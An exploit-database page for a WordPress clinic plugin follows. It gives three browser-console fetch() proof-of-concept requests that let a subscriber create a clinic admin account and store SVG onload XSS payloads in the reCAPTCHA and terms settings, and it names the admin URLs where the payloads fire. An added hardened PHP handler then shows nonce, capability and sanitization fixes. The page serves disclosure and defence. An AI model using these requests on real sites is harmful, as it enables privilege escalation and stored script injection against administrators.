## https://sploitus.com/exploit?id=WPEX-ID:162D0029-2ADC-4925-9985-1D5D672DBE75
Run one of the commands below in the browser's developer console while logged in to the blog as a subscriber user.

To add a clinic admin:
```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=setup_clinic_admin&first_name=Attacker&last_name=Attacker&user_email=attacker@localhost.org&mobile_number=11&gender=other',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```
Then log in with the username and credentials sent to the attacker@localhost.org email address.

To update the reCAPTCHA settings (with an XSS payload):
```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=save_google_recaptcha_setting&status=on&site_key=<svg onload=alert(`XSS-site-key`)>&secret_key=<svg onload=alert(`XSS-secret-key`)>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```
The XSS is triggered when an admin opens https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=get_all_general_setting

To update the terms and conditions message with an XSS payload:
```javascript
fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=ajax_post&route_name=terms_condition_save&isVisible=1&content="><svg onload=alert(`XSS`)>"',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```
The XSS is then triggered when accessing https://example.com/wp-admin/admin-ajax.php?action=ajax_get&route_name=terms_condition_list (there may be other locations where the payload is triggered).
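All three requests above succeed because the `ajax_post` handler dispatches on `route_name` without checking who is calling or sanitizing what is stored. The hardened handler below is an added example of the fix, not the plugin's own code: it assumes a nonce named `clinic_ajax_nonce`, option names `clinic_recaptcha` and `clinic_terms`, and a `clinic_admin` role, all of which are hypothetical.

```php
<?php
// Added example (not the plugin's code): capability gate, nonce check and
// input sanitization for the routes named on this page. Names are hypothetical.

// Each privileged route maps to the capability a caller must hold. A plain
// subscriber holds none of these, so the page's PoC requests are refused.
const CLINIC_PRIVILEGED_ROUTES = array(
    'setup_clinic_admin'            => 'create_users',
    'save_google_recaptcha_setting' => 'manage_options',
    'terms_condition_save'          => 'manage_options',
);

function clinic_hardened_ajax_post() {
    // CSRF: the request must carry a nonce issued to the admin page (hypothetical name).
    check_ajax_referer( 'clinic_ajax_nonce', 'nonce' );

    $route = isset( $_POST['route_name'] ) ? sanitize_key( $_POST['route_name'] ) : '';

    // Authorization: unknown routes and routes the caller may not use get a 403.
    if ( ! isset( CLINIC_PRIVILEGED_ROUTES[ $route ] )
        || ! current_user_can( CLINIC_PRIVILEGED_ROUTES[ $route ] ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 ); // calls wp_die()
    }

    switch ( $route ) {
        case 'save_google_recaptcha_setting':
            // reCAPTCHA keys are opaque tokens, never HTML: strip tags before storing.
            update_option( 'clinic_recaptcha', array(
                'status'     => isset( $_POST['status'] ) && 'on' === $_POST['status'],
                'site_key'   => sanitize_text_field( wp_unslash( $_POST['site_key'] ?? '' ) ),
                'secret_key' => sanitize_text_field( wp_unslash( $_POST['secret_key'] ?? '' ) ),
            ) );
            break;
        case 'terms_condition_save':
            // Rich text is allowed, but only post-safe HTML: <svg onload=...> is dropped.
            update_option( 'clinic_terms', array(
                'isVisible' => ! empty( $_POST['isVisible'] ),
                'content'   => wp_kses_post( wp_unslash( $_POST['content'] ?? '' ) ),
            ) );
            break;
        case 'setup_clinic_admin':
            $user_id = wp_insert_user( array(
                'user_login' => sanitize_user( wp_unslash( $_POST['user_email'] ?? '' ), true ),
                'user_email' => sanitize_email( wp_unslash( $_POST['user_email'] ?? '' ) ),
                'first_name' => sanitize_text_field( wp_unslash( $_POST['first_name'] ?? '' ) ),
                'last_name'  => sanitize_text_field( wp_unslash( $_POST['last_name'] ?? '' ) ),
                'user_pass'  => wp_generate_password( 24 ),
                'role'       => 'clinic_admin', // hypothetical role name
            ) );
            if ( is_wp_error( $user_id ) ) {
                wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 400 );
            }
            break;
    }
    wp_send_json_success();
}
add_action( 'wp_ajax_ajax_post', 'clinic_hardened_ajax_post' );
```

Stored values must still be escaped on output (`esc_attr()` in settings fields, `wp_kses_post()` when printing the terms text), since the `ajax_get` routes the page names are where the payloads fire.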